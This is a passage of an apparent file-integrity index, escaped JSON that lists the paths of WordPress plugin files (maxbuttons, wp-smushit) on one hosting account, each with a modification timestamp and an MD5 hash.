content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/sidebar_end.tpl\":{\"d\":1544493946,\"h\":\"e13a4b3c41173e81ca6d7e39696ee71e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/text.tpl\":{\"d\":1544493946,\"h\":\"e66c7f69dd67090d2f5cd37b6d9a28b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/color.tpl\":{\"d\":1544493946,\"h\":\"937c15e4586181dc10e2f19f87f0e743\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/radio.tpl\":{\"d\":1544493946,\"h\":\"fa6f1e8dc6966023ac67dd881fc97649\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/group_end.tpl\":{\"d\":1544493946,\"h\":\"bbd9d2dc3a1224a6a88f813a0772a6d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/group_start.tpl\":{\"d\":1544493946,\"h\":\"b2170a68c998602863f18d0a5f65b027\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/hidden.tpl\":{\"d\":1544493946,\"h\":\"5469f5f070ea5f9647c1ce1b23ec3ce7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/button.tpl\":{\"d\":1544493946,\"h\":\"2c0277d81bd66372475b425a9d8daea7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/slider.tpl\":{\"d\":1544493946,\"h\":\"372d776c75b66ff90f9d2036b2901244\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/generic.tpl\":{\"d\":1544493946,\"h\":\"bcd00b2a2c435dbc3de1be5f6d47289d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/sidebar_start.tpl\":{\"d\":1544493946,\"h\":\"22f39a4a47335381f291c571727cdae0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/radius.tpl\":{\"d\":1544493946,\"h\":\"7e0f093f8ac847ccdafc28e315330fc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/textarea.tpl\":{\"d\":1544493946,\"h\":\"905706017ad58493f966d9a4521afda9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/number.tpl\":{\"d\":1544493946,\"h\":\"e99d84658973bef1b7df7ca646b2593f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/checkbox.tpl\":{\"d\":1544493946,\"h\":\"6d472fe49961214227d8db39b4ada29f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/start.tpl\":{\"d\":1544493946,\"h\":\"f0e96981c284e271ec9a9caaecdc7f12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/switch.tpl\":{\"d\":1544493946,\"h\":\"dc6586874cf1da53f54016fbfab23562\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/spacer.tpl\":{\"d\":1544493946,\"h\":\"99783a33307cad9aa58cfad1ca19b756\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/block_end.tpl\":{\"d\":1544493946,\"h\":\"845ac34902dfc8332fb5f0625d685dd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/block_start.tpl\":{\"d\":1544493946,\"h\":\"ac5f8d26d8c790c40a0dd92f4ac4753d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/option_select.tpl\":{\"d\":1544493946,\"h\":\"ae3ecc0ee2fe52ac368d8a7da282e8bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/tpl\\/end.tpl\":{\"d\":1544493946,\"h\":\"6432784bdd45c4b0f84402de7bd21fe8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/basic.php\":{\"d\":1544493946,\"h\":\"1e35c5f7bfab00e7275c529c20bcfbfa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/text.php\":{\"d\":1544493946,\"h\":\"ad0287b3380a4cc45b6c367d55f81fae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/gradient.php\":{\"d\":1544493946,\"h\":\"8a24b9074a3d36aa9a12b43c998b7810\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/border.php\":{\"d\":1544493946,\"h\":\"c51d5e23a976b8b72a17ae24484ae554\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/advanced.php\":{\"d\":1544493946,\"h\":\"af68277c3763a8481bfc3ee2891d0717\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/color.php\":{\"d\":1544493946,\"h\":\"f0f9f9eeddc4fabb4562ea4123633b13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/dimension.php\":{\"d\":1544493946,\"h\":\"ad64e1cab6c38ac5aa181df8ea2b1cb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/meta.php\":{\"d\":1544493946,\"h\":\"c2c112d99d9f9a7a436f7c720aaed7bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/container.php\":{\"d\":1544493946,\"h\":\"b64ea192a43f1543ac986fc195eb0eaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/blocks\\/responsive.php\":{\"d\":1544493946,\"h\":\"c360b6d359cef6fb9a691f1e4ec9884b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/changelog.txt\":{\"d\":1544493946,\"h\":\"0a6e7a73b154b607ef3844a840ecdf92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/index.php\":{\"d\":1544493946,\"h\":\"65a2bc5438a192fba798ed8b63e6e28e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/readme.txt\":{\"d\":1544493946,\"h\":\"c192f0af1e67c681fdf1bb76dec863bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/maxbuttons.php\":{\"d\":1544493946,\"h\":\"8794ec6e367260637d42a58d9dd01a16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/languages\\/wp-smushit.pot\":{\"d\":1545805002,\"h\":\"f90cf5fcfeb80c70123e25a035ddebb2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/css\\/admin.min.css\":{\"d\":1545805002,\"h\":\"74fa486e7f5dd2d267754b992668d6a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/css\\/resize-detection.min.css\":{\"d\":1545805002,\"h\":\"0831eb2344f32080fdce65df40568270\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/css\\/common.min.css\":{\"d\":1545805002,\"h\":\"cfdda9dcfa5705211765cbd7c3da9815\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/blocks.min.js\":{\"d\":1545805002,\"h\":\"ec7276709be690b090527efe05725043\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/shared-ui.min.js\":{\"d\":1545805002,\"h\":\"3712fc809b2df334d3bf7d2542d8e5e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/resize-detection.min.js\":{\"d\":1545805002,\"h\":\"1fbc3150c516e6735cf886d37bb11bcf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/shared-ui.min.js.map\":{\"d\":1545805002,\"h\":\"990daf175beb40d3c4ba236c668f1b3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/blocks.min.js.map\":{\"d\":1545805002,\"h\":\"a0a2180f1e2462d27bef0749113f5fa0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/media.min.js.map\":{\"d\":1545805002,\"h\":\"7b0e8abaf074564dda2d050d95041fa8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/admin.min.js.map\":{\"d\":1545805002,\"h\":\"7cee20725470a6f4e5e0960070e10d6c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/resize-detection.min.js.map\":{\"d\":1545805002,\"h\":\"7d9f6ab1e4adb1dd8a7f964df4ebab9c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/media.min.js\":{\"d\":1545805002,\"h\":\"7129749c4a2d935e60df35a4b35625ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/js\\/admin.min.js\":{\"d\":1545805002,\"h\":\"190fce666a53cf8f6994a45c2d21ad7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/fonts\\/wpmudev-plugin-icons.eot\":{\"d\":1545805002,\"h\":\"2f68b18b20a8ca5a9f1345852803e157\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/fonts\\/wpmudev-plugin-icons.woff\":{\"d\":1545805002,\"h\":\"63726bf0e779984e87deca6ab73d677a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/fonts\\/wpmudev-plugin-icons.woff2\":{\"d\":1545805002,\"h\":\"294f2c6e0085509b87bc8f4fa07e94f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/assets\\/fonts\\/wpmudev-plugin-icons.ttf\":{\"d\":1545805002,\"h\":\"72d027af83de8e34b0c8293b2153fd64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/pro-features\\/meta-box-header.php\":{\"d\":1545805003,\"h\":\"be35b97ee3939a8ada9b2d87cc830d45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/pro-features\\/meta-box.php\":{\"d\":1545805003,\"h\":\"6f56c011d090c12d9ac5c1690b4c9b5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/summary\\/meta-box.php\":{\"d\":1545805003,\"h\":\"783ab2e5041157f7277e30fb707e3cbd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/bulk\\/meta-box-header.php\":{\"d\":1545805003,\"h\":\"a1f4734afe4ec2b7244417474fd24937\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/bulk\\/meta-box.php\":{\"d\":1545805003,\"h\":\"955c3d538c490a46ff13680b09ae22e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/upsell-meta-box.php\":{\"d\":1545805003,\"h\":\"30c65ef5ddaac441838007ac15a4715f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/disabled-meta-box.php\":{\"d\":1545805003,\"h\":\"f9b0676195b3367b03964dbfa853c7c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/meta-box-header.php\":{\"d\":1545805003,\"h\":\"312fa11c1ad46c97355f33d2763fe445\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/meta-box.php\":{\"d\":1545805003,\"h\":\"2a58367a721dd13a517ce2415ca63f7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/meta-box-footer.php\":{\"d\":1545805003,\"h\":\"a34670614b18a2b9c38d0597fdc650c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/cdn\\/upsell-meta-box-header.php\":{\"d\":1545805003,\"h\":\"d619927e622dc3ff91ee7077e5ac2f8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/integrations\\/meta-box.php\":{\"d\":1545805003,\"h\":\"91a3712ad2806ca619f53765f17d2a7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/integrations\\/meta-box-footer.php\":{\"d\":1545805003,\"h\":\"ab41a457012d52059cddf79bda286c89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/bulk-settings\\/meta-box.php\":{\"d\":1545805003,\"h\":\"3697150380895395de2d6ca3e81bd6c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/bulk-settings\\/meta-box-footer.php\":{\"d\":1545805003,\"h\":\"ca867571eb352f3a52e8af262be2054b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/directory\\/meta-box.php\":{\"d\":1545805003,\"h\":\"208719ef3c7ebf2a44c0739e4a4af2da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/nextgen\\/meta-box-header.php\":{\"d\":1545805003,\"h\":\"670cdfff1bb8f8c0346d0df39e386c10\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/nextgen\\/meta-box.php\":{\"d\":1545805003,\"h\":\"841f8c10e4f0f2f456f9942e9e0c6a54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/nextgen\\/summary-meta-box.php\":{\"d\":1545805003,\"h\":\"6dda6720f58efc37faa85cde39680737\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-boxes\\/settings\\/meta-box.php\":{\"d\":1545805003,\"h\":\"3620bfc3bfd266096dcd60399db23168\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/modals\\/directory-list.php\":{\"d\":1545805003,\"h\":\"d9d5bc60c177d9b30b752ae4f4e7f38b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/modals\\/progress-dialog.php\":{\"d\":1545805003,\"h\":\"cca096715f5f87bb80487a8aa31e4027\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/modals\\/quick-setup.php\":{\"d\":1545805003,\"h\":\"1d7e3dc1dcb5b743fe15570c25aa8573\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/blocks\\/progress-bar.php\":{\"d\":1545805003,\"h\":\"64c0294f40490ff74acbe76134b3e809\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/meta-box.php\":{\"d\":1545805003,\"h\":\"4429350cbb8918e013bc086ded282da0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/tabs.php\":{\"d\":1545805003,\"h\":\"3cb76c557d54b6d93112084c631a1671\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/smush-page.php\":{\"d\":1545805003,\"h\":\"2b72df43406616714ef4909ccfe863ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/views\\/wp-smush-nextgen-bulk-page.php\":{\"d\":1545805003,\"h\":\"9063ccb743e8829c9b8a2fb758d68a40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/class-wp-smush-dashboard.php\":{\"d\":1545805002,\"h\":\"4337c623016dc2a0c0d360a05cbab35c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/class-wp-smush-nextgen.php\":{\"d\":1545805003,\"h\":\"5fe940cd8211571aa23cbd70a9ad29eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/app\\/abstract-wp-smush-view.php\":{\"d\":1545805003,\"h\":\"c00b8f105228a74c15648f49060c595b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/modules\\/_variables.scss\":{\"d\":1545805003,\"h\":\"7d9016fa2a1ef75144c4d46374e99b1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/modules\\/_directory-smush.scss\":{\"d\":1545805003,\"h\":\"8956b4e32cd3f356a7966398e0913d83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/modules\\/_admin.scss\":{\"d\":1545805003,\"h\":\"1862074dad6fd87b39ff5f948d263fac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/modules\\/_cdn.scss\":{\"d\":1545805003,\"h\":\"802a753f04d1d6550f4ecb270441190e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/modules\\/_media.scss\":{\"d\":1545805003,\"h\":\"6fca3152f75bacd4361781dbabe5f050\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/common.scss\":{\"d\":1545805003,\"h\":\"3466d48798d0de89a79be3a1a1799170\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/resize-detection.scss\":{\"d\":1545805003,\"h\":\"2dde0bf7b112e21f412e5b6ffc11c265\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/scss\\/app.scss\":{\"d\":1545805003,\"h\":\"24fe1d3c93030625bcc1293b4aef71b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/smush\\/smush.js\":{\"d\":1545805003,\"h\":\"1f5a102fd19d0732187088e581352f01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/smush\\/cdn.js\":{\"d\":1545805003,\"h\":\"b2385071c57d46bab16ea0ff0ed48bf8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/smush\\/directory-scanner.js\":{\"d\":1545805003,\"h\":\"2c6aecb0cfb4e06c87a73caf53f21cd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/directory-smush.js\":{\"d\":1545805003,\"h\":\"edecaf586251b95e93eb2edfcaf150bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/bulk-smush.js\":{\"d\":1545805003,\"h\":\"7a9dc08ca191e274aa9ac41662bffaa5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/admin.js\":{\"d\":1545805003,\"h\":\"0ad8696ff3ac4ce368f85ccf2f57caf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/helpers.js\":{\"d\":1545805003,\"h\":\"272d42e53909841e151d7f2b499ced33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/modals.js\":{\"d\":1545805003,\"h\":\"8804a1cf746e54b01343547d998d93ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/modules\\/notice.js\":{\"d\":1545805003,\"h\":\"5a7e5e90602c787e8deebe73fbac0e06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/public-resize-detection.js\":{\"d\":1545805003,\"h\":\"af5fc9fd894c037d7a97f9cc4ca62912\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/app.js\":{\"d\":1545805003,\"h\":\"a5654f69a9090fc8f7915c527fe055e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/shared-ui.js\":{\"d\":1545805003,\"h\":\"2471e9095d780dd09b573b6046eb268b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/media.js\":{\"d\":1545805003,\"h\":\"34fc101ee81df5a6974e390d61bf5479\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/js\\/blocks.js\":{\"d\":1545805003,\"h\":\"21262dbd3b66aad8b46dcd3a6d3c3055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/fonts\\/wpmudev-plugin-icons.eot\":{\"d\":1545805003,\"h\":\"2f68b18b20a8ca5a9f1345852803e157\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/fonts\\/wpmudev-plugin-icons.woff\":{\"d\":1545805003,\"h\":\"63726bf0e779984e87deca6ab73d677a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/fonts\\/wpmudev-plugin-icons.woff2\":{\"d\":1545805003,\"h\":\"294f2c6e0085509b87bc8f4fa07e94f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/_src\\/fonts\\/wpmudev-plugin-icons.ttf\":{\"d\":1545805003,\"h\":\"72d027af83de8e34b0c8293b2153fd64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/external\\/free-dashboard\\/module.php\":{\"d\":1545805003,\"h\":\"badf826d29e6649f6afd7ac4959970c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/external\\/free-dashboard\\/README.md\":{\"d\":1545805003,\"h\":\"90f7f0409fa9e6ee2c446c9dec78049b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/external\\/free-dashboard\\/admin.js\":{\"d\":1545805003,\"h\":\"f994e46c702220f5a2fb4f88dd013833\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/external\\/free-dashboard\\/admin.css\":{\"d\":1545805003,\"h\":\"97fcb31f94a8e988615477d53d48244d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/s3\\/class-wp-smush-s3-compat.php\":{\"d\":1545805003,\"h\":\"95475c38730f5954a315d2b44ff6d194\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/nextgen\\/class-wp-smush-nextgen-stats.php\":{\"d\":1545805003,\"h\":\"6e5601dd0d0529fb0ee4795994b056ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/nextgen\\/class-wp-smush-nextgen-admin.php\":{\"d\":1545805003,\"h\":\"9a3c703594e167ee6ca51ffc5a12bddd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/class-wp-smush-s3.php\":{\"d\":1545805003,\"h\":\"391a19a409262f314c06a1800a093ea4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/class-wp-smush-gutenberg.php\":{\"d\":1545805003,\"h\":\"e6ac7a2f479d65efbcd6836d6eb631f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/class-wp-smush-common.php\":{\"d\":1545805003,\"h\":\"8e2bd5a0afcba85abe16f2c9e0b2abf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/class-wp-smush-nextgen.php\":{\"d\":1545805003,\"h\":\"f827fb504f742ba981674d1e1763eded\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/integrations\\/abstract-wp-smush-integration.php\":{\"d\":1545805003,\"h\":\"97d9485b4a595beb8c99cfb0dc782db2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/api\\/class-wp-smush-api.php\":{\"d\":1545805003,\"h\":\"e80e1e3238b1806f362bee79c988b081\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-smushit\\/core\\/api\\/class-wp-smush-api-request.php\":{\"d\":1545805003,\"h\":\"e942acdf2a38a149551316ff2f830242\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\